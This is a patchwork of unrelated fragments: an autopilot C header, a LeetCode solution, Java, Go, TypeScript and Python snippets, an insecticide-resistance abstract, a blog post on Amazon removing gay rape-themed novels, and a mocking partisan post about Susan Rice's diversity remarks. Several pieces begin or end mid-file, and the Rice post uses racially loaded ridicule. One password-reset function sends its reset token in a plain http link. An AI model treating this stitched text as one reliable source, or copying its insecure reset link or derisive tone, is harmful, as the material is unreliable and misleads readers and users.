#define _DEFINED_TYPEDEF_FOR_TAttVicon_
typedef struct {
real_T dPhiVicon;
real_T dThetaVicon;
real_T dPsiVicon;
} TAttVicon;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_THeartBeat_
#define _DEFINED_TYPEDEF_FOR_THeartBeat_
typedef struct {
uint32_T uiHeartBeat;
} THeartBeat;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IVicon_
#define _DEFINED_TYPEDEF_FOR_IVicon_
typedef struct {
TState state;
TPosVicon posVicon;
TAttVicon attVicon;
THeartBeat heartBeat;
} IVicon;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TTestbedObjects_
#define _DEFINED_TYPEDEF_FOR_TTestbedObjects_
typedef struct {
IVicon object1;
IVicon object2;
IVicon object3;
IVicon object4;
IVicon object5;
IVicon object6;
IVicon object7;
IVicon object8;
IVicon object9;
IVicon object10;
IVicon object11;
IVicon object12;
IVicon object13;
IVicon object14;
IVicon object15;
IVicon object16;
IVicon object17;
IVicon object18;
IVicon object19;
IVicon object20;
} TTestbedObjects;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IViconMulti_
#define _DEFINED_TYPEDEF_FOR_IViconMulti_
typedef struct {
TState state;
TTestbedObjects objects;
} IViconMulti;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TContFw_
#define _DEFINED_TYPEDEF_FOR_TContFw_
typedef struct {
real_T dFlap;
real_T dElev;
real_T dAileron;
real_T dRudder;
real_T dThrottle;
} TContFw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IContFw_
#define _DEFINED_TYPEDEF_FOR_IContFw_
typedef struct {
TState state;
TContFw contFw;
} IContFw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TContQuad_
#define _DEFINED_TYPEDEF_FOR_TContQuad_
typedef struct {
real_T dRollQuad;
real_T dPitchQuad;
real_T dYawQuad;
real_T dThrustQuad;
} TContQuad;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IContQuad_
#define _DEFINED_TYPEDEF_FOR_IContQuad_
typedef struct {
TState state;
TContQuad contQuad;
} IContQuad;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TContRw_
#define _DEFINED_TYPEDEF_FOR_TContRw_
typedef struct {
real_T dT1MR;
real_T dT2MR;
real_T dF3MR;
real_T dF2TR;
real_T dRpmCtrl;
} TContRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IContRw_
#define _DEFINED_TYPEDEF_FOR_IContRw_
typedef struct {
TState state;
TContRw contRw;
} IContRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TServoTicks_
#define _DEFINED_TYPEDEF_FOR_TServoTicks_
typedef struct {
uint16_T uiServo1;
uint16_T uiServo2;
uint16_T uiServo3;
uint16_T uiServo4;
uint16_T uiServo5;
uint16_T uiServo6;
uint16_T uiServo7;
uint16_T uiServo8;
uint16_T uiServo9;
} TServoTicks;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IPcToServos_
#define _DEFINED_TYPEDEF_FOR_IPcToServos_
typedef struct {
TState state;
TServoTicks servoTicks;
} IPcToServos;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPilotChannels_
#define _DEFINED_TYPEDEF_FOR_TPilotChannels_
typedef struct {
uint16_T uiChannel1;
uint16_T uiChannel2;
uint16_T uiChannel3;
uint16_T uiChannel4;
uint16_T uiChannel5;
uint16_T uiChannel6;
uint16_T uiChannel7;
uint16_T uiChannel8;
uint16_T uiChannel9;
} TPilotChannels;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IStick_
#define _DEFINED_TYPEDEF_FOR_IStick_
typedef struct {
TState state;
TPilotChannels pilotChannels;
} IStick;
#endif
/* Forward declaration for rtModel */
typedef struct RT_MODEL_AutopilotGlobal RT_MODEL_AutopilotGlobal;
#endif /* RTW_HEADER_AutopilotGlobal_types_h_ */
/*
* File trailer for Real-Time Workshop generated code.
*
* [EOF]
*/
#endif // AUTOPILOTGLOBAL_TYPES_H
|
/*
* @lc app=leetcode id=76 lang=cpp
*
* [76] Minimum Window Substring
*
* https://leetcode.com/problems/minimum-window-substring/description/
*
* algorithms
* Hard (29.59%)
* Total Accepted: 214.9K
* Total Submissions: 717.5K
* Testcase Example: '"ADOBECODEBANC"\n"ABC"'
*
* Given a string S and a string T, find the minimum window in S which will
* contain all the characters in T in complexity O(n).
*
* Example:
*
*
* Input: S = "ADOBECODEBANC", T = "ABC"
* Output: "BANC"
*
*
* Note:
*
*
* If there is no such window in S that covers all characters in T, return the
* empty string "".
* If there is such window, you are guaranteed that there will always be only
* one unique minimum window in S.
*
*/
class Solution {
public:
    string minWindow(string s, string t) {
        // Standard sliding-window approach: extend the window to the right until
        // it covers every character of t, then shrink it from the left while it
        // still covers t, tracking the smallest valid window seen.
        vector<int> need(128, 0);
        for (char c : t) need[c]++;
        int missing = (int)t.size();
        int left = 0, start = 0, minLen = INT_MAX;
        for (int right = 0; right < (int)s.size(); right++) {
            if (need[s[right]]-- > 0) missing--;
            while (missing == 0) {
                if (right - left + 1 < minLen) {
                    minLen = right - left + 1;
                    start = left;
                }
                if (++need[s[left++]] > 0) missing++;
            }
        }
        return minLen == INT_MAX ? "" : s.substr(start, minLen);
    }
};
/**
* Compiles the generated Jasmin code using the Jasmin tool.
*
* @return the compiled class file
*/
public File compile() {
File outputDir = SpecsIo.getTempFolder("jasmin");
SpecsIo.deleteFolderContents(outputDir);
return compile(outputDir);
}
// cruise-control-metrics-reporter/src/test/java/com/linkedin/kafka/cruisecontrol/metricsreporter/config/EnvConfigProviderTest.java
/*
* Copyright 2021 LinkedIn Corp. Licensed under the BSD 2-Clause License (the "License"). See License in the project root for license information.
*/
package com.linkedin.kafka.cruisecontrol.metricsreporter.config;
import com.linkedin.kafka.cruisecontrol.metricsreporter.CruiseControlMetricsReporterConfig;
import com.linkedin.kafka.cruisecontrol.metricsreporter.CruiseControlMetricsUtils;
import java.io.IOException;
import java.util.HashSet;
import java.util.Objects;
import java.util.Set;
import org.apache.kafka.common.config.ConfigData;
import org.junit.Test;
import static com.linkedin.kafka.cruisecontrol.metricsreporter.CruiseControlMetricsReporterConfig.CRUISE_CONTROL_METRICS_TOPIC_CONFIG;
import static com.linkedin.kafka.cruisecontrol.metricsreporter.CruiseControlMetricsReporterConfig.PREFIX;
import static org.apache.kafka.clients.CommonClientConfigs.CLIENT_ID_CONFIG;
import static org.junit.Assert.assertEquals;
/**
* Unit tests for EnvConfigProvider class
*/
public class EnvConfigProviderTest {
public static final String CLIENT_ID = "client1";
public static final String NOT_SUBSTITUTED_CONFIG = "${env:TOPIC}";
public static final String ENV_CONFIG_PROVIDER_TEST_PROPERTIES = "envConfigProviderTest.properties";
public static final String WEBSERVER_SSL_KEYSTORE_PASSWORD_CONFIG = "webserver.ssl.keystore.password";
@Test
public void testEnvConfigProvider() throws IOException {
CruiseControlMetricsReporterConfig configs = CruiseControlMetricsUtils.readConfig(
Objects.requireNonNull(getClass().getClassLoader().getResource(ENV_CONFIG_PROVIDER_TEST_PROPERTIES)).getPath());
String actualClientId = configs.getString(PREFIX + CLIENT_ID_CONFIG);
String expectedClientId = CLIENT_ID;
assertEquals(expectedClientId, actualClientId);
String actualTopic = configs.getString(CRUISE_CONTROL_METRICS_TOPIC_CONFIG);
String expectedTopic = NOT_SUBSTITUTED_CONFIG;
assertEquals(expectedTopic, actualTopic);
}
@Test
public void testExistingEnvReturnsValue() {
String key = System.getenv().keySet().stream().findFirst().orElse("");
String expected = System.getenv(key);
Set<String> set = new HashSet<>();
set.add(key);
ConfigData actual;
try (EnvConfigProvider configProvider = new EnvConfigProvider()) {
actual = configProvider.get("", set);
}
assertEquals(expected, actual.data().get(key));
}
@Test
public void testNonExistingEnvReturnsEmpty() {
Set<String> set = new HashSet<>();
set.add("NON_EXISTING_ENV");
ConfigData actual;
try (EnvConfigProvider configProvider = new EnvConfigProvider()) {
actual = configProvider.get("", set);
}
assertEquals(0, actual.data().size());
}
}
|
Differential ovicidal and larvicidal resistance to benzoylureas in the codling moth, Cydia pomonella
French populations of the codling moth Cydia pomonella (L.) (Lepidoptera, Tortricidae), a major pest in apple and pear orchards, have developed resistance to different classes of insecticides including the benzoylurea diflubenzuron, a chitin synthesis inhibitor. Ovicidal tests performed on two susceptible strains and one strain selected for its resistance to diflubenzuron revealed the same order of magnitude in resistance ratios to this compound (30‐fold) and two other benzoylureas, teflubenzuron and flufenoxuron (22‐ and 11‐fold, respectively). Field rates of these three compounds induced a 45–55% decrease in hatching in the resistant strain, compared to over 90% in the susceptible insects. Despite a 52‐fold ovicidal resistance ratio to the juvenile hormone analog fenoxycarb, this compound induced an 85% decrease in hatching in the resistant strain. Conversely, the newly hatched larvae of the resistant strain exhibited 45 000‐, 33‐ and 2.1‐fold resistance ratios to diflubenzuron, teflubenzuron and flufenoxuron, respectively. The latter value was not significant, and the field rate of flufenoxuron killed over 97% of the resistant larvae while diflubenzuron had no effect. This lack of relationship between ovicidal and larvicidal resistance may be due to different transport properties together with differential enzymatic metabolization. Our results may limit the validity of substitution instars, an approach frequently used for resistance monitoring. More importantly for resistance management, the resistance of different target instars to each compound has to be considered when establishing control strategies.
def reset_password_by_sms(user):
if not user.phone:
raise APIError('User %s has no assigned phone number.' % user.username)
token = AuthToken(token=random_string())
user = update_user(user, temp_token=token)
link = 'http://recover.justyo.co/change.html?c=%s&u=%s' % (
user.temp_token.token, user.username)
message = 'Yo passcode reset: ' + link
    twilio.send(user.phone, message)
// DownloadAllGolangCILintVersions will download all known versions of golangci-lint to dest.
// The downloaded binaries will be named as `golangci-lint-$version`, e.g. `golangci-lint-v1.31.0`.
// If minVersion is not empty, any version lower than minVersion will not be installed.
// Returns list of versions that were installed, or any error encountered if any.
func DownloadAllGolangCILintVersions(dest string, minVersion string) ([]string, error) {
dir, err := ioutil.TempDir("", "golangci-lint-download")
if err != nil {
return nil, errors.Wrapf(err, "cannot create temp directory")
}
defer func() { _ = os.RemoveAll(dir) }()
versions, err := GetGolangCILintVersions()
if err != nil {
return nil, errors.Wrapf(err, "cannot fetch golangci-lint versions")
}
log.Printf("[golangci-lint] Found %v versions of golangci-lint.\n", len(versions))
installer := path.Join(dir, "install.sh")
if err := FetchGolangCILintInstaller(installer); err != nil {
return nil, errors.Wrapf(err, "cannot fetch golangci-lint installer")
}
installedVersions := make([]string, 0, len(versions))
for _, version := range versions {
if minVersion != "" {
if semver.Compare(version, minVersion) < 0 {
log.Printf("[golangci-lint] Skipping install of %v < minVersion (%v).\n", version, minVersion)
continue
}
}
destPath := path.Join(dest, GetNameForVersion(version))
if err := InstallGolangCILintVersion(version, destPath, installer, dir); err != nil {
return nil, errors.Wrapf(err, "cannot install %v to %v", version, destPath)
}
installedVersions = append(installedVersions, version)
log.Printf("[golangci-lint] Installed %v to %v.\n", version, dest)
}
return installedVersions, nil
}
// oith7/src/app/services/link.service.ts (from jaredparkinson/oith7)
import { Injectable } from '@angular/core';
import { FormatGroup } from '../../../../oith-lib/src/models/Chapter';
import { of, EMPTY } from 'rxjs';
import { filter, map, flatMap } from 'rxjs/operators';
import { Router } from '@angular/router';
import { flatMap$ } from '../../../../oith-lib/src/rx/flatMap$';
import { ChapterService } from './chapter.service';
@Injectable({
providedIn: 'root',
})
export class LinkService {
constructor(private router: Router, private chapterService: ChapterService) {}
public runLink(formatGroup: FormatGroup) {
if (
formatGroup.attrs &&
formatGroup.attrs['href'] !== undefined &&
(formatGroup.attrs['href'] as string).includes('figure1_note_asterisk')
) {
return scrollIntoView('[id*="figure1_note_asterisk"]').subscribe();
}
if (
formatGroup.attrs &&
formatGroup.attrs['href'] !== undefined &&
(formatGroup.attrs['href'] as string).includes('#p76') &&
this.chapterService.chapter.id.includes('js-h-1')
) {
return scrollIntoView('.symbol').subscribe();
}
return of(formatGroup)
.pipe(
filter(
o =>
o.attrs !== undefined &&
o.attrs['href'] !== undefined &&
typeof o.attrs['href'] === 'string' &&
!(o.attrs['href'] as string).includes('#note'),
),
map(o => {
const href = (o.attrs as { href: string })['href'];
if (href.includes('http')) {
window.location.href = href;
return EMPTY;
}
return of(
this.router.navigateByUrl((o.attrs as { href: string })['href']),
).pipe(flatMap(o => o));
}),
flatMap(o => o),
)
.subscribe(o => o);
}
}
export function scrollIntoView(selector: string) {
return of(document.querySelector(selector) as HTMLElement).pipe(
filter(o => o !== null),
map(o => {
o.scrollIntoView();
}),
);
}
|
/**
* Cancel the current matching - both the search and any displayed matches.
*/
public void cancel() {
scheduler.cancel();
searchTask.cancelTask();
if (matchRenderer != null) {
renderer.removeLineRenderer(matchRenderer);
renderer.requestRenderLine(matchAnchor.getLine());
anchorManager.removeAnchor(matchAnchor);
matchRenderer = null;
}
}
# Maximum of x*y over x in [a, b] and y in [c, d]: x*y is bilinear, so the
# maximum over the rectangle is always attained at one of the four corners.
a, b, c, d = map(int, input().split())
ans = max(a * c, a * d, b * c, b * d)
print(ans)
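# Worked example (hypothetical input): a=-3 b=-1 c=-4 d=-2 gives the corner
# products 12, 6, 4, 2, so the answer is 12 = (-3) * (-4).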
|
// factcast-factus/src/main/java/org/factcast/factus/snapshot/AggregateSnapshotRepositoryImpl.java
/*
* Copyright © 2017-2020 factcast.org
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.factcast.factus.snapshot;
import java.util.Optional;
import java.util.UUID;
import java.util.concurrent.CompletableFuture;
import lombok.NonNull;
import lombok.val;
import org.factcast.core.snap.Snapshot;
import org.factcast.core.snap.SnapshotCache;
import org.factcast.core.snap.SnapshotId;
import org.factcast.factus.metrics.FactusMetrics;
import org.factcast.factus.projection.Aggregate;
import org.factcast.factus.projection.AggregateUtil;
import org.factcast.factus.serializer.SnapshotSerializer;
public class AggregateSnapshotRepositoryImpl extends AbstractSnapshotRepository
implements AggregateSnapshotRepository {
private final SnapshotSerializerSupplier serializerSupplier;
public AggregateSnapshotRepositoryImpl(
SnapshotCache snapshotCache,
SnapshotSerializerSupplier serializerSupplier,
FactusMetrics factusMetrics) {
super(snapshotCache, factusMetrics);
this.serializerSupplier = serializerSupplier;
}
@Override
public Optional<Snapshot> findLatest(
@NonNull Class<? extends Aggregate> type, @NonNull UUID aggregateId) {
SnapshotId snapshotId =
SnapshotId.of(
createKeyForType(type, () -> serializerSupplier.retrieveSerializer(type)), aggregateId);
Optional<Snapshot> snapshot = snapshotCache.getSnapshot(snapshotId);
recordSnapshotSize(snapshot, type);
return snapshot;
}
@Override
public CompletableFuture<Void> put(Aggregate aggregate, UUID state) {
aggregate.onBeforeSnapshot();
// this is done before going async for exception escalation reasons:
Class<? extends Aggregate> type = aggregate.getClass();
SnapshotSerializer ser = serializerSupplier.retrieveSerializer(type);
// serialization needs to be sync, otherwise the underlying object might change during ser
byte[] bytes = ser.serialize(aggregate);
return CompletableFuture.runAsync(
() -> {
val id =
SnapshotId.of(
createKeyForType(type, () -> ser), AggregateUtil.aggregateId(aggregate));
putBlocking(new Snapshot(id, state, bytes, ser.includesCompression()));
});
}
@Override
protected String getId() {
return "AggregateSnapshotRepositoryImpl";
}
}
|
/**
 * Terminate the Actor. The background thread will be interrupted, and unprocessed messages will be passed to the afterStop
 * method, if it exists.
* Has no effect if the Actor is not started.
*
* @return this (the actor itself) to allow method chaining
*/
@Override
public final Actor terminate() {
while (true) {
final int flag = stopFlag;
if ((flag & S_FINISHED_MASK) != 0 || flag == S_TERMINATING)
break;
if (stopFlagUpdater.compareAndSet(this, flag, S_TERMINATING)) {
if (isActorThread()) {
throw TERMINATE;
}
try {
while (!ongoingThreadTermination.compareAndSet(false, true))
Thread.yield();
if (currentThread != null) {
currentThread.interrupt();
} else {
try {
send(TERMINATE_MESSAGE);
} catch (IllegalStateException ignore) {
}
}
} finally {
ongoingThreadTermination.set(false);
}
break;
}
}
return this;
} |
/**
 * Function to generate Cartesian array combinations
 *
 * @param sets Sets of arrays to combine
 * @return Cartesian product of the arrays
 */
public static List<List<int[]>> combine(List<int[]>... sets) {
    int combinations = 1;
    for (List<int[]> set : sets) {
        combinations *= set.size();
    }
    List<List<int[]>> out = new ArrayList<>();
    for (int i = 0; i < combinations; i++) {
        int j = 1;
        List<int[]> line = new ArrayList<>();
        for (List<int[]> set : sets) {
            line.add(set.get((i / j) % set.size()));
            j *= set.size();
        }
        out.add(line);
    }
    return out;
}
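// For example (hypothetical inputs), combine(setA, setB) with setA = [x0, x1]
// and setB = [y0, y1, y2] yields six lines: (x0,y0), (x1,y0), (x0,y1), (x1,y1),
// (x0,y2), (x1,y2) - the first set cycles fastest, matching the (i / j) % size
// indexing above.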
It’s getting harder and harder to figure out which books Amazon.com will and will not sell. First there was last year’s banishment of gay fiction to the “adult section.” Then for the longest time it was willing to ship that how-to guide for pedophiles, until it wasn’t. Then came the removal of adult incest erotica, but not any from sci-fi scribe Robert A. Heinlein. And now writer Kyle Michel Sullivan says Amazon.com has yanked his self-published titles simply because they feature gay rape themes.
“During our review process, we found that your titles contain content that is in violation of our content guidelines,” Amazon wrote to Sullivan to explain his titles’ disappearance. “As a result, we have removed the books from our store.” And what titles were they? How To Rape A Straight Guy (ASIN B003ZYFCA6) and Rape In Holding Cell 6 (ASIN B00403N14A). Now before you start thinking either of these are how-to guides to rape, allow Sullivan to explain — as he did in a letter to Amazon — what his books are about.
I’m at a loss as to understand how my books violated your content guidelines. They are not pornographic and have solid stories and meaning behind them. The sex in them is not that much more detailed than what you find in Jackie Collins’ and Judith Krantz’s novels, all of which can be found in a library. Also, you carry items that celebrate the torture and murder of women (see “Saw2” “Hostel 2” (oops) where a naked female is strung upside down and butchered so her blood can bathe another naked female lying under her) and the gleeful slaughter of human beings (“American Psycho”, for example). “How To Rape A Straight Guy” has a very provocative title, yes, and its narrator, Curt, is a very in-your-face sort of guy who thinks he can get even with the world by assaulting men. But it winds up hurting innocent people and destroying him. I even have a moment of foreshadowing in it, where Curt as a 6-year-old boy watches a cousin of his torture a dog until it bites him, then the boy’s father kills the dog and goes off to buy another one. The moral of the whole book being, if you treat a man like a dog his whole life, you shouldn’t be surprised if he bites you. And the sad reality is, when he finally does bite back, he’s the one who’s punished. Does that sound like porn? “Rape In Holding Cell 6”, both volumes, is about corruption in the judicial system, and its main character, Antony, is investigating the brutal rape and murder of his lover in the county jail. He finds a legal and political system that thinks it can get away with anything and nearly drives himself insane in his quest for revenge, a quest that threatens to harm the innocent as well as the guilty as he becomes exactly what he hates. Does that sound like porn? You pulled my titles because that reporter at the Fox affiliate labeled my book pornography. If you actually HAD done your research, you’d see that they do not fall under that category. I can see them being viewed as erotica because the sex is very intense…and not at all sugar-coated…but that’s it. And they were on Amazon’s website being offered for sale for years without a problem. So will you also be removing other books once viewed as porn, like “Ulysses” and “Henry and June” and “Lolita”? Will you continue to offer DVDs of movies that depict the torture and rape of women, like “Straw Dogs” and “A Clockwork Orange”? I ask that Amazon reconsider this. My books are not pornography and should never have been labeled as such. According to the Supreme Court, “in Miller v. California , 413 U.S. 15 (1973) (The basic guidelines for the trier of fact must be: (a) whether “the average person, applying contemporary community standards” would find that the work, taken as a whole, appeals to the prurient interest, Roth, supra, at 489, (b) whether the work depicts or describes, in a patently offensive way, sexual conduct specifically defined by the applicable state law, and (c) whether the work, taken as a whole, lacks serious literary, artistic, political, or scientific value.” (Emphasis added.) Please have your panel look further into the matter and reconsider your actions.
Amazon did “look further” into the matter, and isn’t budging in its promise to keep them offline. Without having read them, clearly. The hypocrisy of the web retailer’s censorship policy is becoming more and more evident with each round of removals. But here we have an example where books about male-on-male sexual violence are pulled from Amazon’s store, while literally hundreds, if not thousands of titles that feature heterosexual sexual aggression and rape remain in stock. And no matter where you stand on whether these books constitute the “glorifying” of rape (which, really, they do not), shouldn’t patrons of Amazon demand the company either sell any type of book, or apply its censorship policy uniformly?
Which it won’t do, of course. Because that would wipe out some of its best-sellers.
// URLFor attempts to find a url which may be used to retrieve the file at the given path.
func (ac *aliCDNStorageMiddleware) URLFor(ctx context.Context, path string, options map[string]interface{}) (string, error) {
if ac.StorageDriver.Name() != "oss" {
dcontext.GetLogger(ctx).Warn("the AliCDN middleware does not support this backend storage driver")
return ac.StorageDriver.URLFor(ctx, path, options)
}
acURL, err := ac.urlSigner.Sign(ac.baseURL+path, time.Now().Add(ac.duration))
if err != nil {
return "", err
}
return acURL, nil
}
Susan Rice: Too Many Smart White Guys on National Security Team Putting America at Risk
Actual Black Person and National Security Advisor Susan Rice told graduates at Florida International University in a commencement speech a week or three ago that the presence of too many “white, male, and Yale” personnel in America’s national security agencies she helps staff and run is posing a threat to the very security of the United States.
“Too often, our national security workforce has been what former Florida Senator Bob Graham called ‘white, male, and Yale,'” Rice stated. “In the halls of power, in the faces of our national security leaders, America is still not fully reflected. I’m not talking about a human resources issue. I’m highlighting a national security imperative.”
So what the hell exactly is Rice talking about that’s so dangerous besides herself?
“By now, we should all know the dangers of ‘groupthink,’ where folks who are alike often think alike. By contrast, groups comprised of different people tend to question one another’s assumptions, draw on divergent perspectives and experiences, and yield better outcomes.”
So that means all people of a certain melanin ratio think the same way? I think that’s the same kind of racist hate that many still say about people of color.
Or that once in government, Blacks, Whites, Latinos, gay people and all others don’t all become weasels and suckups who always agree with their boss? Also, one can’t help but notice that Rice, in her powerful position, is already Black. And that other guy, the one who sits at the head of the table, he also looks Black.
And about that “Yale” part of the equation Rice also does not like. Rice attended elite Stanford University, and then went on to even more elite Oxford University in England, kinda on the Yale spectrum. Her boss, Barack Obama, went to Columbia and Harvard, so so much for diversity there. Maybe she should resign in favor of someone who went to Ohio State on a football scholarship.
Rice wasn’t done in her commencement speech, as she had to explain her views on the utter shallowness of diplomacy, about how America can fool foreigners with funny costumes that for sure matter more than policies such as drone strikes against civilians and overthrowing governments:
“Moreover, we want our national security leaders to reflect America’s best self to the world and inspire others to follow our example. Not by preaching pluralism and tolerance, but by practicing it. Think of the LGBT person in Bangladesh who knows that someone at the American embassy understands who she is. Think of the Iraqi soldier, learning to fight alongside Iraqis from other religious sects, who takes inspiration from America’s own multi-ethnic force. Think of young Haitians drawn to converse with a Foreign Service officer who has dreadlocks like their own. That is how we build bridges and deepen partnerships in an increasingly globalized world.”
Damn, that’s it. If only more of our diplomats grew dreads things would be working better for America out there.
BONUS: I am in favor of diversity. But the arguments Rice is making were made in part years ago about bringing more women into government. We did, and it didn’t change sh*t about the way America conducts itself in the world.
# Concatenate the space-separated digits into a single number and test whether
# it is divisible by 4.
input_text = list(map(int, input().split()))
target = int("".join(map(str, input_text)))
if target % 4 == 0:
    print("YES")
else:
    print("NO")
from ad_api.base import Client, sp_endpoint, fill_query_params, ApiResponse
class Snapshots(Client):
"""
Use the Amazon Advertising API for Sponsored Products for campaign, ad group, keyword, negative keyword, and product ad management operations. For more information about Sponsored Products, see the Sponsored Products Support Center. For onboarding information, see the account setup topic.
"""
@sp_endpoint('/v2/hsa/{}/snapshot', method='POST')
def post_snapshot(self, recordType, **kwargs) -> ApiResponse:
"""
Returns:
ApiResponse
"""
return self._request(fill_query_params(kwargs.pop('path'), recordType), data=kwargs.pop('body'), params=kwargs)
@sp_endpoint('/v2/hsa/snapshots/{}', method='GET')
def get_snapshot(self, snapshotId, **kwargs) -> ApiResponse:
r"""
Gets the status of a requested snapshot.
Returns:
ApiResponse
"""
return self._request(fill_query_params(kwargs.pop('path'), snapshotId), params=kwargs)
def download_snapshot(self, **kwargs) -> ApiResponse:
r"""
        Downloads the snapshot from the location previously returned by get_snapshot (this is not part of the official Amazon Advertising API; it is a helper method to download the snapshot). Keep in mind that a direct download of the location returned in get_snapshot will return 401 - Unauthorized.
        kwarg parameter **file**: if not provided, the default Amazon name from the download path is used (add a path with a trailing slash / if you want a specific folder; do not add an extension, as the return will provide the right extension based on the chosen format if needed)
        kwarg parameter **format**: if not provided, a url to download the snapshot is returned (this url has an expiration time)
        Keyword Args
            | **url** (string): The location obtained from get_snapshot [required]
            | **file** (string): The path to save the file if mode is download json, zip or gzip. [optional]
            | **format** (string): The mode to download the snapshot: data (list), raw, url, json, zip, gzip. Default (url) [optional]
Returns:
ApiResponse
"""
return self._download(self, params=kwargs)
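# A minimal usage sketch (record type, IDs, and the response payload shape are
# hypothetical; consult the Amazon Advertising API docs for real values):
#
#   client = Snapshots(credentials=credentials)
#   res = client.post_snapshot("campaigns", body='{"stateFilter": "enabled"}')
#   status = client.get_snapshot("snapshot-id")
#   data = client.download_snapshot(url=location_from_status, format="data")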
|
import {Controller} from '../../../common/controller/controller';
import {View} from '../../../common/view/view';
import {BladeController} from '../../common/controller/blade';
import {Blade} from '../../common/model/blade';
import {LabelProps, LabelView} from '../view/label';
interface Config<C extends Controller<View>> {
blade: Blade;
props: LabelProps;
valueController: C;
}
export class LabelController<
C extends Controller<View>,
> extends BladeController<LabelView> {
public readonly props: LabelProps;
public readonly valueController: C;
constructor(doc: Document, config: Config<C>) {
const viewProps = config.valueController.viewProps;
super({
...config,
view: new LabelView(doc, {
props: config.props,
viewProps: viewProps,
}),
viewProps: viewProps,
});
this.props = config.props;
this.valueController = config.valueController;
this.view.valueElement.appendChild(this.valueController.view.element);
}
}
|
package lucene;
import java.io.File;
import org.apache.lucene.analysis.standard.StandardAnalyzer;
import org.apache.lucene.index.IndexWriterConfig;
import org.apache.lucene.search.spell.PlainTextDictionary;
import org.apache.lucene.search.spell.SpellChecker;
import org.apache.lucene.store.Directory;
import org.apache.lucene.store.FSDirectory;
import org.apache.lucene.util.Version;
public class SpellCheck {
@SuppressWarnings("deprecation")
public static String Suggest(String wordForSuggestions){
try{
            File dir = new File("index/suggest"); // directory holding the spell-checker index
Directory directory = FSDirectory.open(dir);
SpellChecker spellChecker = new SpellChecker(directory);
spellChecker.indexDictionary(new PlainTextDictionary(new File(
"/usr/share/dict/words")), new IndexWriterConfig(
Version.LUCENE_CURRENT, new StandardAnalyzer(
Version.LUCENE_CURRENT)), false);
int suggestionsNumber = 1;
            //Check whether the word is in the dictionary
if(!spellChecker.exist(wordForSuggestions)){
String[] suggestions = spellChecker.suggestSimilar(wordForSuggestions,
suggestionsNumber);
if (suggestions != null && suggestions.length > 0) {
for (String word : suggestions) {
//only one
if (!word.toLowerCase().equals(wordForSuggestions.toLowerCase())){
return word;
}
}
}
}
spellChecker.close();
        }catch(Exception e){
            // Ignore indexing/lookup failures and fall through to return "".
        }
return "";
}
}
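// A minimal usage sketch (the input word and the suggestion are hypothetical):
//
//   String suggestion = SpellCheck.Suggest("helo"); // e.g. "hello", or "" if no fix is found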
|
// pkg/runtime/rule/route.go
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package rule
import (
"github.com/pkg/errors"
)
import (
"github.com/arana-db/arana/pkg/proto/rule"
"github.com/arana-db/arana/pkg/runtime/cmp"
)
type Matcher interface {
Eval() (rule.Range, error)
}
type baseExpMatcher rule.VTable
func (bem *baseExpMatcher) vtab() *rule.VTable {
return (*rule.VTable)(bem)
}
func (bem *baseExpMatcher) innerEval(c *cmp.Comparative) (rule.Range, error) {
k := c.Key()
	// non-sharding key: no shard metadata, so there is nothing to match
dbMetadata, tbMetadata, ok := bem.vtab().GetShardMetadata(k)
if !ok {
return nil, nil
}
value, err := c.Value()
if err != nil {
return nil, errors.Wrap(err, "eval failed:")
}
var md *rule.ShardMetadata
if tbMetadata != nil {
md = tbMetadata
} else {
md = dbMetadata
}
switch c.Comparison() {
case cmp.Ceq:
return Single(value), nil
case cmp.Cgt:
after, err := md.Stepper.After(value)
if err != nil {
return nil, errors.WithStack(err)
}
return md.Stepper.Ascend(after, md.Steps)
case cmp.Cgte:
return md.Stepper.Ascend(value, md.Steps)
case cmp.Clt:
before, err := md.Stepper.Before(value)
if err != nil {
return nil, errors.WithStack(err)
}
return md.Stepper.Descend(before, md.Steps)
case cmp.Clte:
return md.Stepper.Descend(value, md.Steps)
case cmp.Cne:
return nil, nil
default:
return nil, errors.Errorf("unsupported comparison %s", c.Comparison())
}
}
type cmpExpMatcher struct {
*baseExpMatcher
c *cmp.Comparative
}
func (c *cmpExpMatcher) Eval() (rule.Range, error) {
if c.c == nil {
return nil, nil
}
return c.innerEval(c.c)
}
func Route(r *rule.Rule, tableName string, c *cmp.Comparative) (Matcher, error) {
vt, ok := r.VTable(tableName)
if !ok {
return nil, errors.Errorf("no vtable '%s' found", tableName)
}
mat := &cmpExpMatcher{
baseExpMatcher: (*baseExpMatcher)(vt),
c: c,
}
return mat, nil
}
func MatchTables(r *rule.Rule, tableName, column string, it rule.Range) (rule.DatabaseTables, error) {
vt, ok := r.VTable(tableName)
if !ok {
return nil, errors.Errorf("no vtable '%s' found", tableName)
}
if it == nil {
return nil, nil
}
var values []interface{}
for it.HasNext() {
values = append(values, it.Next())
}
if len(values) < 1 {
return emptyDatabaseTables, nil
}
visits := make(map[uint64]struct{})
ret := make(rule.DatabaseTables)
for _, value := range values {
dbIdx, tbIdx, err := vt.Shard(column, value)
if err != nil {
return nil, err
}
